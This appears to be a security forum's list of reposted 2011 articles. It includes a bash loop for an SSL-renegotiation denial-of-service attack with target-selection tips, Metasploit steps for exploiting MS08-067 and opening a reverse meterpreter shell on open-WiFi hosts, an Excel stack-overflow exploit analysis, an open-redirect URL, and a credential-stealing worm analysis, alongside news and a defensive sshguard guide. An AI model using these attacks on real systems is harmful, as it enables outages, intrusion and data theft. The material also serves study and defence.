
Nytro

Everything posted by Nytro

  1. THC-SSL-DOS

It's not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash:

-----BASH SCRIPT BEGIN-----
thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thc-ssl-dosit & done
-----BASH SCRIPT END-------

http://www.thc.org

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure renegotiation feature to trigger thousands of renegotiations via a single TCP connection.

Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix source: thc-ssl-dos-1.4.tar.gz
Use "./configure; make all install" to build.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:
A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: a DSL connection is not an equal opponent to challenge the bandwidth of a server.
This is turned upside down for THC-SSL-DOS: the processing capacity for SSL handshakes is far superior on the client side: a laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are suboptimal: servers are prepared to handle large amounts of traffic, and clients are constantly sending requests to the server even when not under attack. The SSL handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amounts of SSL handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats
1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: the HTTPS port (443) is not always the best choice. Other SSL-enabled ports are less likely to use an SSL Accelerator (like POP3S, SMTPS, ... or the secure database port).

Countermeasures:
No real solution exists. The following steps can mitigate (but not solve) the problem:
1. Disable SSL renegotiation
2. Invest in an SSL Accelerator
Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.

Yours sincerely,
The Hackers Choice

#!/bin/the hacker's choice - THC

Sursa: http://www.thc.org/thc-ssl-dos/
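The asymmetry argument above can be made concrete with a back-of-the-envelope model. This is only an illustration: the 15x cost ratio and the 300 handshakes/s server figure come from the article, while the derived client capacity is an assumption built from those same numbers.

```python
# Illustrative cost model for the SSL-handshake asymmetry described above.
# The 15x ratio and 300 h/s figures are from the article; the derived
# client capacity (15 * 300 = 4500 h/s) is a simplifying assumption.

SERVER_CLIENT_COST_RATIO = 15   # server does ~15x the work per handshake
SERVER_CAPACITY_HPS = 300       # handshakes/s an average server can sustain

def client_load_fraction(attack_rate_hps,
                         client_capacity_hps=SERVER_CLIENT_COST_RATIO * SERVER_CAPACITY_HPS):
    """Fraction of one client's handshake budget needed to drive the attack.

    If the server side of a handshake costs ~15x the client side, a host
    comparable to the server could initiate roughly 4500 handshakes/s.
    """
    return attack_rate_hps / client_capacity_hps

# Saturating a 300 h/s server from a single client:
fraction = client_load_fraction(SERVER_CAPACITY_HPS)
print(f"{fraction:.0%} of one client's handshake capacity")  # 7%
```

The result (a single-digit percentage of one client's capacity to saturate the server) is consistent with the article's 10-25% laptop CPU estimate once real-world overhead is added.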
  2. 'Poison Ivy' Kit Enables Easy Malware Customization for Attackers By Brian Prince on November 03, 2011 It is no secret malware kits have been the source of many of the infections plaguing users in recent years. This trend is epitomized by Poison Ivy, a remote administration tool (RAT) at the heart of the Nitro attacks targeting the chemical and defense industries. In a new research paper, Microsoft chronicled how Poison Ivy works and why it continues to be utilized by attackers. For one thing, the tool is available for free. “Poison Ivy has an official website from which the kit is distributed. It is also available on a variety of underground websites and forums,” according to the Microsoft report. “This free and open distribution is growing increasingly uncommon as the malware authors of today tend to operate exclusively within their trusted circles and sell their creations to the highest bidders.” According to Microsoft, Poison Ivy uses a client/server architecture to essentially turn victim machines into “servers” that operators can then connect to and remotely control. “The malware is considered a kit because operators can configure the server application to their liking before generating a server assembly that is then distributed and covertly installed on victim systems,” the Microsoft researchers wrote in the paper. “These server assemblies are very small (generally between 7 KB and 10 KB). The kit also contains a “client” component that a controller can use to remotely access and control compromised systems.” Once on an infected system, the malware enables an attacker to download and upload files remotely, log keystrokes, inject malicious code and perform other malicious activities. The malware is distributed in a variety of ways, from software vulnerabilities to phishing e-mails, with the latter being how Poison Ivy infiltrated RSA earlier this year. 
Poison Ivy was also linked to the GhostNet spy operation uncovered in 2009, as well as the Nitro attacks recently publicized by Symantec. “With Poison Ivy there's the option to pay the author for customized versions,” Roel Schouwenberg, senior researcher at Kaspersky Lab, told SecurityWeek. “However, we believe that in these APT-style attacks the attackers customize Poison Ivy themselves.” Officials at Microsoft said the company has removed Poison Ivy from some 16,000 infected machines as of last month. In the report, researchers note the United States has been the hardest hit in 2011, accounting for 12 percent of infections. Second and third on the list are Korea and Spain, which registered nine and seven percent, respectively. The Microsoft paper can be downloaded here: http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=27871 Sursa: https://www.securityweek.com/poison-ivy-kit-enables-easy-malware-customization-attackers

Here's the thing: did these people only just realize, after 3 years, that such "kits" exist?
  3. REC - Reverse Engineering Compiler

Features

As mentioned, Rec Studio 4 is still under development. Most target-independent features have been completed, such as:

Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.
Symbolic information support using Dwarf 2 and partial recognition of Microsoft's PDB format.
C++ is partially recognized: mangled names generated by gcc are demangled, and inheritance described in Dwarf 2 is honored. However, C++ is a very broad and difficult language, so some features like templates won't likely ever be supported.
Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package.
Interactivity is supported, limited to definition of sections, labels and function entry points. It will need to be improved to support in-program definition of types and function parameters.

Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program database file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of subroutine code and form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data. In practice, only C executable files produce meaningful decompiled output.

Download: http://www.backerstreet.com/rec/recdload.htm
  4. Exploiting “Free Public WiFi”

Posted by Skyler on November 2, 2011 – 12:05 pm

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test. My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited (MS08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

Connect to the ad-hoc network:
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc

Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad-hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)

Configure your IP (for the reverse shell to shovel back to):
# ifconfig wlan1 169.254.1.1 netmask 255.255.0.0

Own it:
# msfconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST 169.254.131.118
# set LHOST 169.254.1.1
# exploit

Pretty straightforward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! It's fantastic!

Sursa: http://securityreliks.securegossip.com/2011/11/exploiting-free-public-wifi/
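The "find the ad-hoc host's IP" step above is easy to automate. A minimal sketch (not from the original post) that pulls the source address out of a `tcpdump -nt` NetBIOS datagram line like the one shown:

```python
import re

# Example line as printed by 'tcpdump -ni wlan1 -s0 -nt' in the post above.
NBT_LINE = "IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)"

def adhoc_host_ip(tcpdump_line):
    """Return the source IP from a tcpdump NBT broadcast line, or None.

    tcpdump prints addresses as ip.port, so the trailing dotted field is
    the UDP port (138 for NetBIOS datagrams) and must be stripped off.
    """
    m = re.match(r"IP (\d+\.\d+\.\d+\.\d+)\.138 > ", tcpdump_line)
    return m.group(1) if m else None

print(adhoc_host_ip(NBT_LINE))  # 169.254.131.118
```

The extracted address is what you would feed to `set RHOST` in the Metasploit steps above.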
  5. As Hacking Increases, Being Anonymous Getting Harder

Anonymous isn’t so anonymous anymore. Companies like Sony will continue to witness more breaches of their virtual networks until top-level executives start taking hackers, and the cyber gangs that run many of them, as seriously as they take their client base. Not only do Sony PlayStation gamers want their IDs and internet protocol addresses kept secret, companies like Sony want their computer systems, housing thousands of sensitive corporate data files, protected just the same. In the tug of war between software security and cyber criminals, the red ribbon on the rope is still squarely in the middle, which means this is one battle the security guys have not fully won. In fact, it is doubtful that they ever will. For every piece of malware companies like Kaspersky Lab have destroyed, two more have popped up in its place. Tim Armstrong, a virus researcher at the Massachusetts-based headquarters of Russian IT security firm Kaspersky Lab, said on the company’s website Wednesday that corporations were not doing enough to protect their data and the personal information of their clients. “Companies have a lack of high level education that these threats are important to deal with,” he said. “Until they do, more security breaches will happen.” Sony has become the poster child of bad corporate IT. The company’s online gaming division was hacked again last month. Hacking has become somewhat glamorous. But hackers operate in different worlds. There’s the advanced persistent threat, or APT, which is usually the mastermind of governments. There are various cyber criminals and gangs from China to Russia who are after bank accounts and harvesting personal identities. Then there are the new hacktivist groups, like Anonymous, and even LulzSec, who once said that hackers should target Sony’s PlayStation site in order to get Americans off the couch.
Many companies might not understand internet security, but the backside of a security breach is often more costly than it is to set up a security wall around a product, or network; a network that a growing number of corporate customers are linked into through QR codes and, of course, the now famous “cloud” of virtual networks that are making personal hard drives obsolete. On Oct. 21, I spoke with Kaspersky Lab analyst Sergey Golovanov about the latest security threats, from APTs to botnets, and whether or not the top three software security firms had it under control.

Rapoza: Your CEO Eugene Kaspersky says computer networks are increasingly under attack. Is it getting worse?

Golovanov: I think we all have the malicious security issues under control at present. But if individuals and companies do not see just how big of a problem these code writers are becoming, and if they let their guard down, then the malware writers will definitely win. All the world is connected by computers. Your electric power is run by computer networks. Stuxnet, a worm IT security analysts found last year, shut down all of Iran’s electricity. If we are talking about a common user, whether a company or a personal computer or smart phone, malware writers can do anything they want with the data they mine from a network. They will steal your data. They will steal your money. They will steal your identity. It is becoming a bigger problem.

Experts at Kaspersky Lab are continuing an ongoing investigation into what has become the biggest malware program to date, known as Duqu. Golovanov said last month that Duqu shares some characteristics with the infamous Stuxnet worm that targeted industrial installations in Iran. Though the ultimate objective of the creators of this new cyber threat is still unknown nearly two months later, what is clear is that Duqu is being used for carrying out targeted attacks on a limited number of objects, including those in Iran.
Commenting on the new findings, Alexander Gostev, Chief Security Expert at Kaspersky Lab, was quoted saying on the company’s website: “Despite the fact that the systems attacked by Duqu are located in Iran, to date there is no evidence of their being industrial or nuclear program-related systems (like Stuxnet). As such, it is impossible to confirm that the target of the new malicious program is the same as that of Stuxnet. Nevertheless, it is clear that every infection by Duqu is unique. This information allows one to say with certainty that Duqu is being used for targeted attacks on pre-determined objects.”

Duqu is most likely an APT. That type of program isn’t going to hack into a person’s Xbox Live account, or their Android. In fact, the malware gunning for Microsoft and Google networks are numerous and potentially just as damaging. Not only does a company like Sony start to lose credibility in its fight against cybercrime, but smartphones running Android are more susceptible to attacks than iPhones. Bad for Google. Great for Apple. All told, on computer devices running Kaspersky Lab security software alone, 213,602,142 network attacks were blocked. Over 263 million malware programs were detected and neutralized. By comparison, in August 193.9 million network attacks were blocked and 258 million malware programs were detected and eliminated. That’s just on machines running Kaspersky Lab IT software, so the number is actually much bigger when considering devices using Symantec’s Norton brand security products and McAfee.

KR: What’s making Android more attractive to hackers than iPhone?

SG: We haven’t found any iPhone malware yet. Everyone is looking for the Android users, and that’s probably because the iPhone is a closed operating system and Android is an open operating system, so it is easier to create malicious software for it.
KR: The new quick response (QR) codes, those crazy scannable boxes you see with scrambled crossword-puzzle-like squares inside on everything from the local newspaper to a box of cereal now; they seem to be the new favorite of hackers. How do they work and how do you stop them?

SG: You can use security software applications to stop them, for the most part. The first known instance of QR code malware we found in Russia in September. Russians thought they were downloading a new Android app called Jimm, but instead, when they swiped their phone over that bar code, it ended up sending numerous text messages to a long distance number that they had to pay for. We’ve found a few of them in Russia and know who is spreading them and who is making them.

KR: Who is it?

SG: It’s a hacker network in Russia. Mostly Russian. The Russians are like the project managers of the group, and the QR codes are just spread out through malware writers within that network, through blogs or on news websites that were hacked. The code brings users to a fake application. It’s all about exploiting people, and once you’re infected, the hackers have your phone number and can access info on your smartphone.

KR: What’s a recent malware program you guys helped neutralize?

SG: The Hlux botnet. We did that with Microsoft mostly. We had been tracking it since early in the year. It was mostly stealing personal data, phishing, spamming and sending out denial of service attacks on computers. We have full control over it now and are working with U.S. law enforcement on the case. The roots of the operation are in the U.S., but we are pretty sure their base of operations is in Russia.

KR: How do you stay on top of hacker groups?

SG: We infiltrate their online chat forums, especially through the invisible web or by using Tor, an anonymous network where hackers like LulzSec and Anonymous often hang out.

KR: A black market internet. Deep cover cyberspace. That’s as anonymous as you get, I guess.

SG: Yes. We’re in there.
We have to weed through a lot of nonsense, but you can get a sense of what those groups are doing in that hidden internet. They’re usually up to no good. Sursa: http://www.forbes.com/sites/kenrapoza/2011/11/03/as-hacking-increases-being-anonymous-getting-harder/
  6. Microsoft Excel 2007 SP2 Buffer Overwrite Exploit

Abysssec Research

1) Advisory information
Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability
Analysis : Abysssec.com
Vendor : Microsoft Corporation
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

Microsoft: A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Each Excel file can contain multiple BOF (2057) records. This record specifies the first substream associated with the workbook. One of the fields in these records specifies the substream record that follows. This field can be extracted in the sub_3018F0C2 function.

.text:301A0C87 push [ebp+arg_2C]
.text:301A0C8A mov ecx, [ebp+var_14]
.text:301A0C8D push 1
.text:301A0C8F call sub_3018F0C2
.text:301A0C94 mov ecx, eax
.text:301A0C96 mov eax, [ebp+arg_24]
.text:301A0C99 cmp eax, ebx
.text:301A0C9B mov [ebp+var_10], ecx
.text:301A0C9E jz short loc_301A0CA2
.text:301A0CA0 mov [eax], ecx

If the field value is equal to 400, the sub_3019DFBA function is called to check the file type. If the file type is xls, EXCEL.exe will display a message; if approved, it will continue to run the code. If you change the file extension to xlb, there will not be any message. After this step the sub_3053F626 function will be executed. This function will parse the next BOF records.
.text:304D4E9D cmp [ebp+arg_20], ebx
.text:304D4EA0 jnz short loc_304D4EC6
.text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h
.text:304D4EAC jnz short loc_304D4EC6
.text:304D4EAE mov edx, [ebp+arg_C]
.text:304D4EB1 mov ecx, [ebp+arg_8]
.text:304D4EB4 push 3Fh
.text:304D4EB6 call sub_3019DFBA
.text:304D4EBB cmp eax, ebx
.text:304D4EBD mov [ebp+var_8], eax
.text:304D4EC0 jz loc_304D4FD3
.text:304D4EC6
.text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j
.text:304D4EC6 ; sub_301A0BC7+3342E5j
.text:304D4EC6 push ebx
.text:304D4EC7 push dword_30EB89A4
.text:304D4ECD push [ebp+var_C]
.text:304D4ED0 call sub_3053F626
.text:304D4ED5 cmp dword_30F5E64C, ebx
.text:304D4EDB mov [ebp+var_8], eax
.text:304D4EDE jz short loc_304D4EE7
.text:304D4EE0 cmp eax, ebx
.text:304D4EE2 jz short loc_304D4EE7

One of the records that may come after the BOF is an undocumented record with record type 0xA7 (167). To be parsed correctly, this record should be accompanied by another record of record type 0x3C (60). If this requirement is met, the length of the records is read and the record data is copied onto the stack. The function that copies the record data onto the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which is read from the file. The second argument specifies the destination of the copy, and the third argument specifies the maximum amount of data that can be copied. The values of the second and third arguments are based on computations over values read from the file, and a computational error can occur in this computation ...
.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55

The vulnerability here is that we can change the value of the third parameter to a value of our own. The program does not correctly validate the third argument of sub_30199E55, so the desired amount of data can be written to the desired location on the stack.

.text:30199E60 cmp edi, [esp+4+Dst]
.text:30199E64 ja loc_303EE1B7
.text:30199E6A mov ecx, [esp+4+arg_0]
.text:30199E6E push ebx
.text:30199E6F mov ebx, dword_30F726C0
.text:30199E75 push ebp
.text:30199E76 mov ebp, nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+10h+Dst], ecx
....
.text:30199E93 mov eax, [esp+10h+Dst]
.text:30199E97 push esi ; Size
.text:30199E98 lea edx, dword_30F6E6B8[ebx]
.text:30199E9E push edx ; Src
.text:30199E9F push eax ; Dst
.text:30199EA0 sub edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add [esp+1Ch+Dst], esi
.text:30199EAB add ebx, esi
.text:30199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov dword_30F726C0, ebx
.text:30199EB8 jnz loc_301E0DB3

Exploiting: Stack overflows are not hard to exploit at all! But we have both /GS and SAFESEH here. Because we control the memcpy, we can make it start overwriting the stack after the /GS cookie, and from there, when the function returns, our values sit at ESP; a simple call esp reaches them and the game is over!
Exploit can be downloaded from here: http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip EDB mirror: http://www.exploit-db.com/sploits/18067.zip Sursa: Microsoft Excel 2007 SP2 Buffer Overwrite Exploit
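The record layout the advisory walks through can be sketched in a few lines. This is an illustration of the BIFF record stream format ([type:u16][length:u16][data], little-endian) and of the bounds check whose absence the advisory describes; it is not Excel's code, and `safe_copy` is a hypothetical corrected version of what sub_30199E55 should do.

```python
import struct

def parse_biff_records(blob):
    """Walk a BIFF stream of [type:u16][length:u16][data] records."""
    records, off = [], 0
    while off + 4 <= len(blob):
        rtype, rlen = struct.unpack_from("<HH", blob, off)
        records.append((rtype, blob[off + 4 : off + 4 + rlen]))
        off += 4 + rlen
    return records

def safe_copy(dst, src, n, dst_cap):
    # The check missing in sub_30199E55: n derives from file-controlled
    # lengths, so it must be clamped to the real destination capacity.
    if n > dst_cap:
        raise ValueError("record length exceeds destination buffer")
    dst[:n] = src[:n]

# Toy stream: a BOF (2057 = 0x0809), the undocumented 0xA7 record,
# and a 0x3C (Continue) record carrying 3 bytes of payload.
stream = (struct.pack("<HH", 0x0809, 2) + b"\x00\x04"
          + struct.pack("<HH", 0x00A7, 0)
          + struct.pack("<HH", 0x003C, 3) + b"abc")
print([hex(t) for t, _ in parse_biff_records(stream)])  # ['0x809', '0xa7', '0x3c']
```

With file-controlled lengths flowing into the copy size, the `safe_copy` clamp is exactly the validation whose omission lets crafted 0xA7/0x3C records overwrite the stack.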
  7. Made in the Czech Republic: a PHP Autorun worm November 3, 2011 at 7:21 am Recently, a new data-stealing worm caught our attention. The reason why it stands out from many similar amateur creations is that its author is most probably Czech, as the text strings, variable and function names used by the malware suggest. The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft. But wait, variable and function names used by the programmer? Those aren’t normally seen in a compiled binary unless we have the associated PDB file (Program DataBase: a file format commonly created at compile-time that may list symbols that aren’t stored in the compiled module itself). But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. This embedder simply encodes the PHP source files using Turck MMCache and then adds the resulting PHP bytecode as resources in a launcher binary. By decoding these, we were able to get a fairly accurate view of the original source code. So let’s take a look at what the malware actually does… Installation and Spread Firstly, we classify it as a worm, as it contains methods for spreading itself. In order to replicate through removable media and modify the infected system to ensure persistence, i.e. that it gets relaunched subsequently, the worm copies its body to the following locations: The root directory of all mounted volumes, except A: and B:. If the drive size is less than ~32GB, the autorun.inf file is also dropped in the hope of exploiting the (at last!) deprecated AutoRun feature of Windows. The Documents, Desktop, Start Menu, Start Menu\Programs and Start Menu\Programs\Startup folders for each user on the system and to the All Users Start Menu\Programs folder. 
Note that the worm can only copy itself to folders belonging to other users if the worm is run by an administrator account. Also, due to the change of folder naming from Windows Vista onwards, the worm is only able to copy itself to some of the listed folders on earlier Windows systems (such as XP) if it's a Czech version of the OS. For each of the above mentioned locations, the worm randomly chooses one of the following innocuous-looking file names:

setup.exe
install.exe
fotky.exe
majkl_dzeksn.exe
barunka.exe
martinka.exe

Harvesting data

The purpose of the worm is to collect a large set of sensitive user data and system information, including:

Messages and other information from various IM clients (such as QIP, ICQ, Digsby)
Saved passwords and other information from various browsers (such as IE, Mozilla Firefox, Opera, Chrome)
Saved passwords from common email clients (such as Outlook, Windows Mail, Yahoo! Mail or Gmail)
Emails and other information from various email clients (such as Outlook, Outlook Express, Mozilla Thunderbird)
Total Commander FTP passwords
Stored Windows credentials
Windows Address Book contacts
Windows User account properties (excluding password)
Network addresses, open connections, tables and statistics
List of running processes and services
Environment variables
List of all user files and directories
List of recently opened documents
Contents of the Registry
MS Windows and MS Office Product Keys

The list of types of data that the worm harvests from the infected machine is quite long, and they are all gathered using various unsophisticated methods. In order to collect most of the data associated with Instant Messaging applications, browsers, and so on, the worm simply uploads all the files from the installation folders of the respective applications.
For information related to Windows user accounts, network connections, running processes, and the Windows Registry, the following shell commands are used:

net user
ipconfig
netstat
arp
tasklist
regedit

Another method employed for collecting the victim's data is the use of third-party password-extraction utilities by NirSoft. The worm's binary drops and executes four of these tools and sends their output back to the attacker. The worm uses a simple mechanism for sending the collected data to the remote server. It sends many HTTP POST requests (port 80) containing the stolen data gz-compressed and Base64 encoded. As you can see from the description above, the worm lacks the sophistication of some of the more advanced malware that we sometimes see. Yet, unfortunately, even these simple threats often get the job done. Given the very low prevalence of this malware, the fact that at the time of this writing 100% of the detections came from the Czech Republic, and its apparent Czech origin, there is a possibility that this tool was used in a targeted attack on a specific victim. Or it may just have been an experiment by an amateur malware-writer. Or both. ESET detects this worm as Win32/AutoRun.PSW.Agent.E. The malware analysis was done by Jakub Horky.

Robert Lipovsky
Malware Researcher

Sursa: http://blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm
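The exfiltration encoding described above (gz-compressed, then Base64) is trivial to reproduce. A minimal sketch of that wire format; the function names are mine, and the post does not document the exact POST body layout:

```python
import base64
import gzip

# Sketch of the worm's exfiltration encoding: gzip the stolen data,
# then Base64-encode it for transport in an HTTP POST body.

def encode_payload(data: bytes) -> str:
    return base64.b64encode(gzip.compress(data)).decode("ascii")

def decode_payload(blob: str) -> bytes:
    return gzip.decompress(base64.b64decode(blob))

stolen = b"net user\nipconfig\nnetstat\narp\ntasklist\n"
wire = encode_payload(stolen)
assert decode_payload(wire) == stolen  # round-trips cleanly
```

This kind of encoding is not encryption: anyone who captures the POST traffic can decode it just as easily, which fits the post's point about the worm's lack of sophistication.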
  8. Protect your server with SSHGuard

I've already talked about fail2ban and logcheck, 2 tools that can scan your logs and take actions based on rules that you can give/modify, usually modifying your iptables rules to stop active attacks against your server, or simply sending you a warning if something is found in the logs. Today we'll see a similar tool, sshguard; it is different from the other two in that it is written in C, so it uses less memory and CPU while running, but still achieves the same results. So what does sshguard do? The short version is: it receives log messages, it detects when a networked service has been abused based on them, and blocks the address of whoever abused it; after some time, it releases the blocking. The full version is: sshguard runs on a machine as a small daemon, and receives log messages (in a number of ways, e.g. from syslog). When it determines that address X did something bad to service Y, it fires a rule in the machine's firewall (one of the many supported) for blocking X. Sshguard keeps X blocked for some time, then releases it automatically. Please note that despite its name sshguard detects attacks for many services out of the box, not only SSH but also several ftpds, Exim and dovecot. It can operate all the major firewalling systems, and features support for IPv6, whitelisting, suspension, and log message authentication.

Installation

Sshguard is distributed under the permissive BSD license: you can use, modify and redistribute the software, at your own risk, for any use, including commercial, provided that you retain the original copyright notice you find in it. The software is distributed in the main repository of the most used GNU/Linux distributions and for some *BSD systems, but you can also download the sources from their download page.
To install it on Debian (or other .deb distributions like Ubuntu) just run from a terminal:

sudo aptitude install sshguard

Setup and configuration

Sshguard interfaces to the system in two points:

the logging system (how sshguard receives log messages to monitor)
the firewall (how sshguard blocks naughty addresses)

Since version 1.5, sshguard comes with the Log Sucker. With the Log Sucker, SSHGuard fetches log entries proactively, and handles transparently events like rotated log files and files disappearing and reappearing. In the official documentation page there are instructions for many different firewalls; I'll follow the instructions for netfilter/iptables. sshguard does not have a configuration file. All configuration that has to be done is creating a chain named "sshguard" in the INPUT chain of iptables, where sshguard automatically inserts rules to drop packets coming from bad hosts:

# for regular IPv4 support:
iptables -N sshguard
# if you want IPv6 support as well:
ip6tables -N sshguard

Now update the INPUT chain so it can pass all the traffic to sshguard; specify with --dport all the ports of the services that you want to protect with sshguard.
If you want to prevent attackers from doing any traffic to the host, remove the option completely:

# block any traffic from abusers
iptables -A INPUT -j sshguard
ip6tables -A INPUT -j sshguard

-- or --

# block abusers only for SSH, FTP, POP, IMAP services (use "multiport" module)
iptables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard
ip6tables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard

If you do not currently use iptables and just want to get sshguard up and running without any further impact on your system, these commands will create and save an iptables configuration that does absolutely nothing except allowing sshguard to work:

# iptables -F
# iptables -X
# iptables -P INPUT ACCEPT
# iptables -P FORWARD ACCEPT
# iptables -P OUTPUT ACCEPT
# iptables -N sshguard
# iptables -A INPUT -j sshguard
# /etc/rc.d/iptables save

Conclusions

And that's all you need to do to have a basic installation of sshguard up and running; it will help make your ssh, ftp and other daemons a bit more secure.

Sursa: http://linuxaria.com/recensioni/protect-your-server-with-sshguard?lang=en
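The core loop sshguard implements (watch log lines, count failures per source, block past a threshold) can be sketched in a few lines. This is a toy model, not sshguard's actual code: the regex, threshold, and returned iptables command (targeting the "sshguard" chain created above) are illustrative assumptions.

```python
import re
from collections import Counter

# Toy model of a log-scan-and-block daemon: count failed SSH logins
# per source IP and emit a block rule for the 'sshguard' chain once
# an IP crosses the threshold. Real sshguard also unblocks later.

FAIL_RE = re.compile(r"Failed password .* from (\d+\.\d+\.\d+\.\d+)")
THRESHOLD = 4  # illustrative; sshguard's policy is configurable

def scan(lines, threshold=THRESHOLD):
    fails = Counter()
    blocked = []
    for line in lines:
        m = FAIL_RE.search(line)
        if not m:
            continue
        ip = m.group(1)
        fails[ip] += 1
        if fails[ip] == threshold:  # block exactly once per offender
            blocked.append(f"iptables -A sshguard -s {ip} -j DROP")
    return blocked

log = ["sshd[1]: Failed password for root from 10.0.0.5 port 22 ssh2"] * 4
print(scan(log))  # ['iptables -A sshguard -s 10.0.0.5 -j DROP']
```

The payoff of the chain-based setup above is visible here: the tool only ever appends to and flushes its own "sshguard" chain, never your hand-written INPUT rules.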
  9. Perhaps useful to some:

# Date: 2.11.2011
# Author: Sony
# Blog: st2tea

http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

or

http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

Mirror: Google Maps Open Redirect - Packet Storm
Sursa: st2tea: Google Maps Open Redirect
  10. Vulnerability Assessment vs Penetration Testing

Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test" debate, and it's no different in the web application security space. Sadly, the discussion isn't usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean.

Step 1: agree on terms. So, I'll be ambitious and tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue.

Web Vulnerability Assessment vs. Web Penetration Test

